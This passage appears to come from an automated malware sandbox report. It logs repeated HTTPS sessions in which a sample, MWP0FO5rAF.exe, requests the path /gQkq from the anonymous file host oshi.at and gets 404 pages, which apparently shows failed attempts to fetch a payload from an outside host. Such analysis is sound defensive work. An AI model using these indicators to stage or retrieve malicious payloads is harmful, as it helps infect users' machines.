                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:57:22 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:57:23 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.949969194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:57:25 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:57:26 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:57:26 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:57:26 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.949987194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:57:27 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:57:28 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:57:28 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:57:28 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.949994194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:57:29 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:57:30 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:57:29 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:57:30 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.949995194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:57:31 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:57:31 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:57:31 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:57:31 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.949996194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:57:33 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:57:33 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:57:33 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:57:33 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.2.949998194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:57:34 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:57:35 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:57:35 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:57:35 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            20192.168.2.949999194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:57:36 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:57:37 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:57:37 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:57:37 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            21192.168.2.950000194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:57:38 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:57:39 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:57:39 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:57:39 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            22192.168.2.950001194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:57:40 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:57:41 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:57:40 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:57:41 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            23192.168.2.950002194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:57:42 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:57:42 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:57:42 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:57:42 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            24192.168.2.950003194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:57:47 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:57:47 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:57:47 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:57:47 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            25192.168.2.950004194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:57:49 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:57:49 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:57:49 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:57:49 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            26192.168.2.950005194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:57:51 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:57:51 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:57:51 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:57:51 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            27192.168.2.950006194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:57:53 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:57:54 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:57:53 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:57:54 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
